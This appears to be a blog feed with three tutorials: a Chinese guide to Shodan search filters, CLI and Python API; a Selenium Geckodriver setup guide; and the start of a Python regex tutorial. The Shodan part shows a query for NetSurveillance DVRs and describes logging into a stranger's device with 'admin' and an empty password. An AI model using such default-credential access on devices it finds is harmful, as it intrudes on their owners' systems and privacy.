class="headerlink" title="使用搜索过滤"></a>使用搜索过滤</h3><p>如果像前面单纯只使用关键字直接进行搜索，搜索结果可能不尽人意，那么此时我们就需要使用一些特定的命令对搜索结果进行过滤，常见用的过滤命令如下所示：</p><ul><li><code>hostname</code>：搜索指定的主机或域名，例如 <code>hostname:&quot;google&quot;</code></li><li><code>port</code>：搜索指定的端口或服务，例如 <code>port:&quot;21&quot;</code></li><li><code>country</code>：搜索指定的国家，例如 <code>country:&quot;CN&quot;</code></li><li><code>city</code>：搜索指定的城市，例如 <code>city:&quot;Hefei&quot;</code></li><li><code>org</code>：搜索指定的组织或公司，例如 <code>org:&quot;google&quot;</code></li><li><code>isp</code>：搜索指定的ISP供应商，例如 <code>isp:&quot;China Telecom&quot;</code></li><li><code>product</code>：搜索指定的操作系统/软件/平台，例如 <code>product:&quot;Apache httpd&quot;</code></li><li><code>version</code>：搜索指定的软件版本，例如 <code>version:&quot;1.6.2&quot;</code></li><li><code>geo</code>：搜索指定的地理位置，参数为经纬度，例如 <code>geo:&quot;31.8639, 117.2808&quot;</code></li><li><code>before/after</code>：搜索指定收录时间前后的数据，格式为dd-mm-yy，例如 <code>before:&quot;11-11-15&quot;</code></li><li><code>net</code>：搜索指定的IP地址或子网，例如 <code>net:&quot;210.45.240.0/24&quot;</code></li></ul><h3 id="搜索实例"><a href="#搜索实例" class="headerlink" title="搜索实例"></a>搜索实例</h3><p>查找位于合肥的 Apache 服务器：</p><pre><code>apache city:&quot;Hefei&quot;</code></pre><p>查找位于国内的 Nginx 服务器：</p><pre><code>nginx country:&quot;CN&quot;</code></pre><p>查找 GWS(Google Web Server) 服务器：</p><pre><code>&quot;Server: gws&quot; hostname:&quot;google&quot;</code></pre><p>查找指定网段的华为设备：</p><pre><code>huawei net:&quot;61.191.146.0/24&quot;</code></pre><p>如上通过在基本关键字后增加指定的过滤关键字，能快速的帮助发现我们感兴趣的内容。当然，还有更快速更有意思的方法，那就是点击 Shodan 搜索栏右侧的 “Explore” 按钮，就会得到很多别人分享的搜索语法，你问我别人分享的语法有什么好玩的？那咱们就随便来看看吧：</p><p><a href="http://image.3001.net/images/20161128/14803150204500.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803150204500.png!small" alt="27-3.png"></a></p><p>咱们随便选取一个名为“NetSureveillance Web”的用户分享语法，从下面的描述信息我们基本就能得知这就是一个弱密码的漏洞，为了方便测试让我们把语法在增加一个国家的过滤信息，最终语法如下：</p><pre><code>Server: uc-httpd 1.0.0 200 OK Country:&quot;CN&quot;</code></pre><p><a href="http://image.3001.net/images/20161128/14803150355281.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803150355281.png!small" alt="27-4.png"></a></p><p>现在让我们随便选取一个页面进去输入，使用admin账号和空密码就能顺利进入了：）</p><p><a href="http://image.3001.net/images/20161128/1480315053949.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/1480315053949.png!small" alt="27-5.png"></a></p><h3 id="其他功能"><a href="#其他功能" class="headerlink" title="其他功能"></a>其他功能</h3><p>Shodan 不仅可以查找网络设备，它还具有其他相当不错的功能。</p><p>Exploits：每次查询完后，点击页面上的 “Exploits” 按钮，Shodan 就会帮我们查找针对不同平台、不同类型可利用的 exploits。当然也可以通过直接访问网址来自行搜索：<a href="https://exploits.shodan.io/welcome" target="_blank" rel="noopener">https://exploits.shodan.io/welcome</a>；</p><p><a href="http://image.3001.net/images/20161128/14803151039105.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803151039105.png!small" alt="27-10.png"></a></p><p>地图：每次查询完后，点击页面上的 “Maps” 按钮，Shodan 会将查询结果可视化的展示在地图当中；</p><p><a href="http://image.3001.net/images/20161128/14803151185705.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803151185705.png!small" alt="27-12.png"></a></p><p>报表：每次查询完后，点击页面上的 “Create Report” 按钮，Shodan 就会帮我们生成一份精美的报表，这是天天要写文档兄弟的一大好帮手啊；</p><p><a href="http://image.3001.net/images/20161128/14803151323230.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803151323230.png!small" alt="27-11.png"></a></p><h2 id="命令行下使用-Shodan"><a href="#命令行下使用-Shodan" class="headerlink" title="命令行下使用 Shodan"></a>命令行下使用 Shodan</h2><p><code>Shodan</code> 是由官方提供的 Python 库的，项目位于：<a href="https://github.com/achillean/shodan-python" target="_blank" rel="noopener">https://github.com/achillean/shodan-python</a></p><p><strong>安装</strong></p><pre><code>pip install shodan</code></pre><p>或者</p><pre><code>git clone https://github.com/achillean/shodan-python.git &amp;&amp; cd shodan-pythonpython setup.py install</code></pre><p>安装完后我们先看下帮助信息：</p><pre><code>➜  ~ shodan -hUsage: shodan [OPTIONS] COMMAND [ARGS]...Options:  -h, --help  Show this message and exit.Commands:  alert       Manage the network alerts for your account  # 管理账户的网络提示  convert     Convert the given input data file into a...  # 转换输入文件  count       Returns the number of results for a search  # 返回查询结果数量  download    Download search results and save them in a...  # 下载查询结果到文件  honeyscore  Check whether the IP is a honeypot or not.  # 检查 IP 是否为蜜罐  host        View all available information for an IP...  # 显示一个 IP 所有可用的详细信息  info        Shows general information about your account  # 显示账户的一般信息  init        Initialize the Shodan command-line  # 初始化命令行  myip        Print your external IP address  # 输出用户当前公网IP  parse       Extract information out of compressed JSON...  # 解析提取压缩的JSON信息，即使用download下载的数据  scan        Scan an IP/ netblock using Shodan.  # 使用 Shodan 扫描一个IP或者网段  search      Search the Shodan database  # 查询 Shodan 数据库  stats       Provide summary information about a search...  # 提供搜索结果的概要信息  stream      Stream data in real-time.  # 实时显示流数据</code></pre><h3 id="常用示例"><a href="#常用示例" class="headerlink" title="常用示例"></a>常用示例</h3><p><strong>init</strong></p><p>初始化命令行工具。</p><pre><code>➜  ~ shodan init [API_Key]Successfully initialized</code></pre><p><strong>count</strong> </p><p>返回查询的结果数量。</p><pre><code>➜  ~ shodan count microsoft iis 6.0575862</code></pre><p><strong>download</strong> </p><p>将搜索结果下载到一个文件中，文件中的每一行都是 JSON 格式存储的目标 banner 信息。默认情况下，该命令只会下载1000条结果，如果想下载更多结果需要增加 <code>--limit</code> 参数。</p><p><a href="http://image.3001.net/images/20161128/14803151703857.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803151703857.png!small" alt="27-6.png"></a></p><p><strong>parse</strong></p><p>我们可以使用 parse 来解析之前下载数据，它可以帮助我们过滤出自己感兴趣的内容，也可以用来将下载的数据格式从 JSON 转换成 CSV 等等其他格式，当然更可以用作传递给其他处理脚本的管道。例如，我们想将上面下载的数据以CSV格式输出IP地址、端口号和组织名称：</p><pre><code>➜  ~ shodan parse --fields ip_str,port,org --separator , microsoft-data.json.gz</code></pre><p><a href="http://image.3001.net/images/20161128/1480315189686.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/1480315189686.png!small" alt="27-7.png"></a></p><p><strong>host</strong></p><p>查看指定主机的相关信息，如地理位置信息，开放端口，甚至是否存在某些漏洞等信息。</p><p><a href="http://image.3001.net/images/20161128/14803152025933.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803152025933.png!small" alt="27-8.png"></a></p><p><strong>search</strong></p><p>直接将查询结果展示在命令行中，默认情况下只显示IP、端口号、主机名和HTTP数据。当然我们也可以通过使用 –fields 来自定义显示内容，例如，我们只显示IP、端口号、组织名称和主机名：</p><pre><code>➜  ~ shodan search --fields ip_str,port,org,hostnames microsoft iis 6.0</code></pre><p><a href="http://image.3001.net/images/20161128/14803152181807.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803152181807.png!small" alt="27-9.png"></a></p><h2 id="代码中使用-Shodan-库"><a href="#代码中使用-Shodan-库" class="headerlink" title="代码中使用 Shodan 库"></a>代码中使用 Shodan 库</h2><p>还是使用上一节讲到的 <a href="https://github.com/achillean/shodan-python" target="_blank" rel="noopener"><code>shodan</code></a> 库，安装方式这里不在阐述了。同样的，在使用 <code>shodan</code> 库之前需要初始化连接 API，代码如下：</p><pre><code>import shodanSHODAN_API_KEY = &quot;API_Key&quot;api = shodan.Shodan(SHODAN_API_KEY)</code></pre><p>随后，我们就可以搜索数据了，示例代码片如下：</p><pre><code>try:    # 搜索 Shodan    results = api.search(&#39;apache&#39;)    # 显示结果    print &#39;Results found: %s&#39; % results[&#39;total&#39;]    for result in results[&#39;matches&#39;]:            print result[&#39;ip_str&#39;]except shodan.APIError, e:    print &#39;Error: %s&#39; % e</code></pre><p><a href="http://image.3001.net/images/20161128/14803152351577.png" target="_blank" rel="noopener"><img src="http://image.3001.net/images/20161128/14803152351577.png!small" alt="27-13.png"></a></p><p>这里 <code>Shodan.search()</code> 会返回类似如下格式的 JSON 数据：</p><pre><code>{        &#39;total&#39;: 8669969,        &#39;matches&#39;: [                {                        &#39;data&#39;: &#39;HTTP/1.0 200 OK\r\nDate: Mon, 08 Nov 2010 05:09:59 GMT\r\nSer...&#39;,                        &#39;hostnames&#39;: [&#39;pl4t1n.de&#39;],                        &#39;ip&#39;: 3579573318,                        &#39;ip_str&#39;: &#39;89.110.147.239&#39;,                        &#39;os&#39;: &#39;FreeBSD 4.4&#39;,                        &#39;port&#39;: 80,                        &#39;timestamp&#39;: &#39;2014-01-15T05:49:56.283713&#39;                },                ...        ]}</code></pre><h3 id="常用-Shodan-库函数"><a href="#常用-Shodan-库函数" class="headerlink" title="常用 Shodan 库函数"></a>常用 Shodan 库函数</h3><ul><li><code>shodan.Shodan(key)</code> ：初始化连接API</li><li><code>Shodan.count(query, facets=None)</code>：返回查询结果数量</li><li><code>Shodan.host(ip, history=False)</code>：返回一个IP的详细信息</li><li><code>Shodan.ports()</code>：返回Shodan可查询的端口号</li><li><code>Shodan.protocols()</code>：返回Shodan可查询的协议</li><li><code>Shodan.services()</code>：返回Shodan可查询的服务</li><li><code>Shodan.queries(page=1, sort=&#39;timestamp&#39;, order=&#39;desc&#39;)</code>：查询其他用户分享的查询规则</li><li><code>Shodan.scan(ips, force=False)</code>：使用Shodan进行扫描，ips可以为字符或字典类型</li><li><code>Shodan.search(query, page=1, limit=None, offset=None, facets=None, minify=True)</code>：查询Shodan数据</li></ul>]]></content>
      
      
      <categories>
          
          <category> Shodan </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Shodan </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Launch Firefox with GeckoDriver (latest)</title>
      <link href="/Coderzgh.github.io/2019/05/16/python-crawler-webdrive-firefox/"/>
      <url>/Coderzgh.github.io/2019/05/16/python-crawler-webdrive-firefox/</url>
      
        <content type="html"><![CDATA[<h1 id="Launch-Firefox-with-GeckoDriver-latest"><a href="#Launch-Firefox-with-GeckoDriver-latest" class="headerlink" title="Launch Firefox with GeckoDriver (latest)"></a>Launch Firefox with GeckoDriver (latest)</h1><p>This article provides a detailed, step by step guide on how to launch  Firefox with Selenium Geckodriver. In this article we use the latest  versions of Selenium, Firefox &amp; Geckodriver and show you how you can  launch Firefox by providing updated code snippets. The tool versions  that we will be using in this article are –</p><ul><li><strong>Selenium</strong> – version 3.11.0</li><li><strong>Firefox</strong> – version 59.0.2 (Firefox Quantum)</li><li><strong>Geckodriver</strong> – version 0.20.1</li></ul><p><strong>Are you using an older version of Selenium Webdriver?</strong> Make sure you switch to the <a href="http://www.automationtestinghub.com/selenium-3/" target="_blank" rel="noopener"><strong>latest Selenium Webdriver version</strong></a> to avoid compatibility issues!!</p><p><img src="http://www.automationtestinghub.com/images/selenium/launch-firefox-with-geckodriver.png" alt="Launch Firefox with Selenium 3.0"></p><h2 id="What-is-Selenium-Geckodriver"><a href="#What-is-Selenium-Geckodriver" class="headerlink" title="What is Selenium Geckodriver?"></a>What is Selenium Geckodriver?</h2><p>Let us first start with the very basics – What is Gecko and  GeckoDriver? Gecko is a web browser engine used in many applications  developed by Mozilla Foundation and the Mozilla Corporation, most  noticeably the Firefox web browser, its mobile version other than iOS  devices, their email client Thunderbird and many other open source  software projects. You can get more information about Gecko here – <a href="https://en.wikipedia.org/wiki/Gecko_(software)" target="_blank" rel="noopener">https://en.wikipedia.org/wiki/Gecko_(software)</a></p><p><strong>Geckodriver is a proxy for using W3C WebDriver-compatible  clients to interact with Gecko-based browsers i.e. Mozilla Firefox in  this case.</strong> This program provides the HTTP API described by the  WebDriver protocol to communicate with Gecko browsers. It translates  calls into the Marionette automation protocol by acting as a proxy  between the local and remote ends.</p><h2 id="How-things-worked-before-Geckodriver-and-Selenium-3"><a href="#How-things-worked-before-Geckodriver-and-Selenium-3" class="headerlink" title="How things worked before Geckodriver and Selenium 3"></a>How things worked before Geckodriver and Selenium 3</h2><p>If you are new to Selenium and you have started directly with  Selenium 3.x, you would not know how Firefox was launched with the  previous versions of Selenium (version 2.53 and before). It was a pretty  straight forward process where you were not required to use Geckodriver  or any other driver. After you <a href="http://www.automationtestinghub.com/download-and-install-selenium/" target="_blank" rel="noopener">download and install Selenium</a>, you just write the code to instantiate the WebDriver and open Firefox. The code snippet is shown below –</p><p>public class FirefoxTest {          public static void main(String[] args) {         WebDriver driver = new FirefoxDriver();         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>1234567</th><th>public class FirefoxTest {        public static void main(String[] args) {        WebDriver driver = new FirefoxDriver();        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p>If you just run this code, you would notice that Firefox browser would get opened and <a href="http://Google.com" target="_blank" rel="noopener">Google.com</a>  would be displayed in the browser. This is how it worked with Selenium  2.53 and before. Let’s see whats the new implementation in Selenium 3.</p><h2 id="What-happens-when-you-don’t-use-Firefox-Geckodriver-with-Selenium-3-x"><a href="#What-happens-when-you-don’t-use-Firefox-Geckodriver-with-Selenium-3-x" class="headerlink" title="What happens when you don’t use Firefox Geckodriver with Selenium 3.x"></a>What happens when you don’t use Firefox Geckodriver with Selenium 3.x</h2><p>To try this out, all that you need to do is point your JAR files to  the latest version of Selenium 3 and then run the same code that is  given above. You will now notice that <a href="http://Google.com" target="_blank" rel="noopener">Google.com</a> page would not open in a new Firefox window. Instead you will see an error message as shown below –</p><blockquote><p><strong>java.lang.IllegalStateException: The path to the  driver executable must be set by the webdriver.gecko.driver system  property; for more information, see <a href="https://github.com/mozilla/geckodriver" target="_blank" rel="noopener">https://github.com/mozilla/geckodriver</a>. The latest version can be downloaded from <a href="https://github.com/mozilla/geckodriver/releases" target="_blank" rel="noopener">https://github.com/mozilla/geckodriver/releases</a></strong></p></blockquote><p><img src="http://www.automationtestinghub.com/images/selenium/webdriver-gecko-driver-error.png" alt="Geckodriver Error"></p><p>You will need to use Selenium Geckodriver to remove this error. Let us see how this can be done.</p><h2 id="How-to-use-Selenium-Geckodriver-to-launch-Firefox"><a href="#How-to-use-Selenium-Geckodriver-to-launch-Firefox" class="headerlink" title="How to use Selenium Geckodriver to launch Firefox"></a>How to use Selenium Geckodriver to launch Firefox</h2><p>To launch Firefox with Selenium Geckodriver, you will first need to  download Geckodriver and then set its path. This can be done in two ways  as depicted in the below image – </p><p><img src="http://www.automationtestinghub.com/images/selenium/process-to-use-geckodriver.png" alt="Process to use Geckodriver"></p><h2 id="Check-if-Firefox-is-32-bit-or-64-bit"><a href="#Check-if-Firefox-is-32-bit-or-64-bit" class="headerlink" title="Check if Firefox is 32-bit or 64-bit"></a>Check if Firefox is 32-bit or 64-bit</h2><p><strong>There are two versions of Geckodriver for Windows: 32-bit and 64-bit</strong>.  Based on whether your Firefox is 32-bit or 64-bit, you need to download  the corresponding Geckodriver exe. In this section, you will first  check whether your Firefox is 32-bit or 64-bit</p><p><strong>1.</strong> Open Firefox on your machine. Click on Hamburger icon from the right corner to open the menu as shown below</p><p><img src="http://www.automationtestinghub.com/images/selenium/firefox-hamburger-icon-menu.png" alt="Open Firefox Menu"></p><p><strong>2.</strong> From this menu, click on Help icon (Help icon is marked in red box in the above image)</p><p><strong>3.</strong> Once you click on Help icon, the <strong>Help Menu</strong> would be displayed</p><p><img src="http://www.automationtestinghub.com/images/selenium/firefox-help-menu.png" alt="Help Menu - Firefox"></p><p><strong>4.</strong> Click on <strong>About Firefox</strong> from the Help menu. <strong>About Mozilla Firefox</strong> popup would be displayed</p><p><img src="http://www.automationtestinghub.com/images/selenium/about-mozilla-firefox-check-firefox-version-59.png" alt="Check if Mozilla Firefox is 32-bit or 64-bit"></p><p><strong>5.</strong> Note down whether Firefox is 32 or 64 bit. <strong>For us, Firefox is 64-bit as shown in the above image.</strong> Now close this popup and close Firefox as well.</p><h2 id="Download-the-latest-version-of-Selenium-Geckodriver"><a href="#Download-the-latest-version-of-Selenium-Geckodriver" class="headerlink" title="Download the latest version of Selenium Geckodriver"></a>Download the latest version of Selenium Geckodriver</h2><p>Follow the steps given below to download Geckodriver –</p><p><strong>1.</strong> Open this Github page – <a href="https://github.com/mozilla/geckodriver/releases" target="_blank" rel="noopener">https://github.com/mozilla/geckodriver/releases</a></p><p><strong>2.</strong> Download the latest release (windows version) based on whether your Firefox is 32-bit or 64-bit. We are downloading <strong>geckodriver-v0.20.1-win64.zip</strong>, as we have 64-bit Firefox</p><p><img src="http://www.automationtestinghub.com/images/selenium/download-geckodriver-latest-version.png" alt="Download latest version of GeckoDriver"></p><p><strong>3.</strong> Once the zip file is downloaded, unzip it to retrieve the driver – geckodriver.exe</p><p>This completes the downloading process. Now let’s see how you can use  it in your project. There are 2 methods using which you can configure  this driver in your project. You can use any of these methods.</p><p>According to this <a href="http://gs.statcounter.com/browser-market-share" target="_blank" rel="noopener">statcounter report</a>, Chrome is by far the most used browser. If you are learning Selenium, <a href="http://www.automationtestinghub.com/selenium-chromedriver/" target="_blank" rel="noopener"><strong>make sure that you run your scripts on Chrome browser as well</strong></a></p><h2 id="Launch-Firefox-Method-1-webdriver-gecko-driver-system-property"><a href="#Launch-Firefox-Method-1-webdriver-gecko-driver-system-property" class="headerlink" title="Launch Firefox Method 1 : webdriver.gecko.driver system property"></a>Launch Firefox Method 1 : webdriver.gecko.driver system property</h2><p>With this method, you will have to add an additional line of code in  your test case. Follow the steps given below to use this method – </p><p><strong>1.</strong> Copy the entire path where you unzipped geckodriver.exe.  Let us assume that the location is – D:\Firefox\geckodriver.exe. You  will need to add <strong>System.setProperty</strong> with the driver location to your code.</p><p>The code to launch Firefox browser would look like this – </p><p><strong>Important Note 1:</strong> In the folder paths in the below  code, we have used double backslash (\). This is because Java treats  single back slash () as an escape character. So you would need to use  double back slash, everywhere you add some folder path.</p><p>public class FirefoxTest {          public static void main(String[] args) {                 System.setProperty(“webdriver.gecko.driver”,”D:\Firefox\geckodriver.exe”);          WebDriver driver = new FirefoxDriver();         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>123456789</th><th>public class FirefoxTest {        public static void main(String[] args) {                System.setProperty(“webdriver.gecko.driver”,”D:\Firefox\geckodriver.exe”);         WebDriver driver = new FirefoxDriver();        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p><strong>Important Note 2:</strong> If you are using older versions of  Geckodriver (v0.16.1 or before), then you will also need to provide the  Firefox Binary, otherwise you might get the below error – </p><p><em>org.openqa.selenium.SessionNotCreatedException: Expected browser  binary location, but unable to find binary in default location, no  ‘moz:firefoxOptions.binary’ capability provided, and no binary flag set  on the command line</em></p><p><strong>But please note that this is needed only for Geckodriver v0.16.1 or before.</strong>  So for older Gecko versions, please use the below code where Firefox  binary location has been provided using FirefoxOptions class.</p><p>public class FirefoxTest {          public static void main(String[] args) {                 System.setProperty(“webdriver.gecko.driver”,”D:\Firefox\geckodriver.exe”);                  FirefoxOptions options = new FirefoxOptions();         options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //This is the location where you have installed Firefox on your machine          WebDriver driver = new FirefoxDriver(options);         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>123456789101112</th><th>public class FirefoxTest {        public static void main(String[] args) {                System.setProperty(“webdriver.gecko.driver”,”D:\Firefox\geckodriver.exe”);                FirefoxOptions options = new FirefoxOptions();        options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //This is the location where you have installed Firefox on your machine         WebDriver driver = new FirefoxDriver(options);        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p><strong>3.</strong> Run this code to verify that everything is working fine. You will notice that <a href="http://google.com" target="_blank" rel="noopener">google.com</a> gets opened in new Firefox window</p><h3 id="Launch-Firefox-Method-2-Set-property-in-Environment-Variables"><a href="#Launch-Firefox-Method-2-Set-property-in-Environment-Variables" class="headerlink" title="Launch Firefox Method 2 : Set property in Environment Variables"></a>Launch Firefox Method 2 : Set property in Environment Variables</h3><p><strong>1.</strong> Copy the entire folder location where geckodriver.exe is  saved. If the entire path is D:\Firefox\geckodriver.exe, then the folder  location would be D:\Firefox\</p><p><strong>2.</strong> Open Advanced tab in System Properties window as shown in below image.</p><p><img src="http://www.automationtestinghub.com/images/selenium/system-properties.png" alt="System Properties"></p><p><strong>3.</strong> Open Environment Variables window. </p><p><img src="http://www.automationtestinghub.com/images/selenium/environment-variables-section.png" alt="Environment Variables Window"></p><p><strong>4.</strong> In System variables section, select the Path variable  (highlighted in the above image) and click on Edit button. Then add the  location of Geckodriver that we copied in step 1 (D:\Firefox), to path  variable (below image shows UI for Windows 10)</p><p><img src="http://www.automationtestinghub.com/images/selenium/add-geckodriver-path-to-environment-variables.png" alt="Add GeckoDriver path to Environment Variables"></p><p><strong>5.</strong> If you are using Windows 7, then move to the end of the  Variable value field, then add a semi-colon (;) and then add the folder  location as shown below (Semicolon acts as a separator between multiple  values in the field)</p><p><img src="http://www.automationtestinghub.com/images/selenium/add-geckodriver-location-in-path-variable.png" alt="Add GeckoDriver in Path Variable - Windows 7"></p><p><strong>6.</strong> Click on Ok button to close the windows. Once the path is  set, you would not need to set the System property every time in the  test script. Your test script would simply look like this – </p><p><strong>For GeckoDriver v0.20, v0.19.0, v0.18.0 and v0.17.0 –</strong> </p><p>public class FirefoxTest {          public static void main(String[] args) {         WebDriver driver = new FirefoxDriver();         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>1234567</th><th>public class FirefoxTest {        public static void main(String[] args) {        WebDriver driver = new FirefoxDriver();        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p> <strong>For GeckoDriver v0.16.1 or before –</strong> </p><p>public class FirefoxTest {          public static void main(String[] args) {         FirefoxOptions options = new FirefoxOptions();         options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //This is the location where you have installed Firefox on your machine          WebDriver driver = new FirefoxDriver(options);         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>12345678910</th><th>public class FirefoxTest {        public static void main(String[] args) {        FirefoxOptions options = new FirefoxOptions();        options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //This is the location where you have installed Firefox on your machine         WebDriver driver = new FirefoxDriver(options);        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p><strong>7.</strong> Run the code to check that it works fine.</p><p> This completes our article on how you can use launch Firefox with  Selenium GeckoDriver. Try it out and let us know if this worked for you.  <strong>Feel free to contact us using comments section if you face any issue while implementing this.</strong></p><p> <strong>UPDATE 1 [30 April, 2017]:</strong> Use DesiredCapabilities and FirefoxOptions to launch Firefox with Selenium GeckoDriver</p><p>public class FirefoxTest {          public static void main(String[] args) {         FirefoxOptions options = new FirefoxOptions();         options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //Location where Firefox is installed          DesiredCapabilities capabilities = DesiredCapabilities.firefox();         capabilities.setCapability(“moz:firefoxOptions”, options);         //set more capabilities as per your requirements          FirefoxDriver driver = new FirefoxDriver(capabilities);         driver.get(“<a href="http://www.google.com&quot;)" target="_blank" rel="noopener">http://www.google.com&quot;)</a>;     } }</p><table><thead><tr><th>1234567891011121314</th><th>public class FirefoxTest {        public static void main(String[] args) {        FirefoxOptions options = new FirefoxOptions();        options.setBinary(“C:\Program Files (x86)\Mozilla Firefox\firefox.exe”); //Location where Firefox is installed         DesiredCapabilities capabilities = DesiredCapabilities.firefox();        capabilities.setCapability(“moz:firefoxOptions”, options);        //set more capabilities as per your requirements         FirefoxDriver driver = new FirefoxDriver(capabilities);        driver.get(“<a href="http://www.google.com" target="_blank" rel="noopener">http://www.google.com</a>“);    }}</th></tr></thead><tbody><tr><td></td></tr></tbody></table><p><strong>Here are a few hand-picked articles for you to read next:</strong></p><ul><li><a href="http://www.automationtestinghub.com/selenium-headless-chrome-firefox/" target="_blank" rel="noopener">Learn how to launch firefox in headless mode with Selenium</a></li><li><a href="http://www.automationtestinghub.com/disable-firefox-logs-selenium/" target="_blank" rel="noopener">Disable low level console logs when you run your tests on Firefox</a></li><li><a href="http://www.automationtestinghub.com/cucumber-selenium-testing-tutorial/" target="_blank" rel="noopener">Add the power of Cucumber BDD to your test scripts</a></li></ul>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Firefox </tag>
            
            <tag> Webdriver </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python网络爬虫实战之五：正则表达式</title>
      <link href="/Coderzgh.github.io/2019/05/15/python-crawler-regular-expression-5/"/>
      <url>/Coderzgh.github.io/2019/05/15/python-crawler-regular-expression-5/</url>
      
        <content type="html"><![CDATA[<h2 id="正文："><a href="#正文：" class="headerlink" title="正文："></a>正文：</h2><p>正则表达式(regular expression)描述了一种字符串匹配的模式（pattern），可以用来检查一个串是否含有某种子串、将匹配的子串替换或者从某个串中取出符合某个条件的子串等。</p><h2 id="通过一个小实例来了解正则表达式的作用"><a href="#通过一个小实例来了解正则表达式的作用" class="headerlink" title="通过一个小实例来了解正则表达式的作用"></a>通过一个小实例来了解正则表达式的作用</h2><pre><code># 从字符串 str 中找出abc/数字import res = &#39;123abc456eabc789&#39;re.findall(r&#39;abc&#39;, s)# result: [&#39;abc&#39;, &#39;abc&#39;]re.findall(&#39;[0-9]+&#39;,s)# result: [&#39;123&#39;, &#39;456&#39;, &#39;789&#39;]</code></pre><h2 id="限定符"><a href="#限定符" class="headerlink" title="限定符"></a>限定符</h2><p>限定符用来指定正则表达式的一个给定组件必须要出现多少次才能满足匹配。有 * 或 + 或 ? 或 {n} 或 {n,} 或 {n,m} 共6种。</p><p><img src="https:////upload-images.jianshu.io/upload_images/2255795-ae6d73e71049b6bb.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1000" alt="img"></p><p>5-1.jpg</p><pre><code>import res = &#39;Chapter1 Chapter2 Chapter10 Chapter99 fheh&#39;re.findall(&#39;Chapter[1-9][0-9]*&#39;, s)# result:[&#39;Chapter1&#39;, &#39;Chapter2&#39;, &#39;Chapter10&#39;, &#39;Chapter99&#39;]re.findall(&#39;Chapter[1-9][0-9]+&#39;, s)# result: [&#39;Chapter10&#39;, &#39;Chapter99&#39;]re.findall(&#39;Chapter[1-9][0-9]?&#39;, s)# result:[&#39;Chapter1&#39;, &#39;Chapter2&#39;, &#39;Chapter10&#39;, &#39;Chapter99&#39;]re.findall(&#39;Chapter[1-9][0-9]{0,1}&#39;, s)# result:[&#39;Chapter1&#39;, &#39;Chapter2&#39;, &#39;Chapter10&#39;, &#39;Chapter99&#39;]re.findall(&#39;Chapter[1-9][0-9]{1,2}&#39;, s)# result:[&#39;Chapter10&#39;, &#39;Chapter99&#39;]</code></pre><h2 id="贪婪匹配与非贪婪匹配"><a href="#贪婪匹配与非贪婪匹配" class="headerlink" title="贪婪匹配与非贪婪匹配"></a>贪婪匹配与非贪婪匹配</h2><p>正则匹配默认是贪婪匹配，也就是匹配尽可能多的字符</p><pre><code>import re# 贪婪模式s = &#39;&lt;H1&gt;Chapter 1 – Introduction to Regular Expressions&lt;/H1&gt;&#39;re.findall(&#39;&lt;.*&gt;&#39;, s)# result: [&#39;&lt;H1&gt;Chapter 1 – Introduction to Regular Expressions&lt;/H1&gt;&#39;]# 非贪婪模式re.findall(&#39;&lt;.*?&gt;&#39;, s)# result: [&#39;&lt;H1&gt;&#39;, &#39;&lt;/H1&gt;&#39;]</code></pre><h2 id="定位符"><a href="#定位符" class="headerlink" title="定位符"></a>定位符</h2><p>定位符使您能够将正则表达式固定到行首或行尾。它们还使您能够创建这样的正则表达式，这些正则表达式出现在一个单词内、在一个单词的开头或者一个单词的结尾。</p><p>定位符用来描述字符串或单词的边界，^ 和 $ 分别指字符串的开始与结束，\b 描述单词的前或后边界，\B 表示非单词边界。</p><p><img src="https:////upload-images.jianshu.io/upload_images/2255795-53ebbb5379727d24.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1000" alt="img"></p><p>5-2.jpg</p><pre><code>import res = &#39;Chapter1 Chapter2 Chapter11 Chapter99&#39;re.findall(&#39;^Chapter[1-9][0-9]{0,1}&#39;, s)# result: [&#39;Chapter1&#39;]re.findall(&#39;^Chapter[1-9][0-9]{0,1}$&#39;, &#39;Chapter99&#39;)# result: 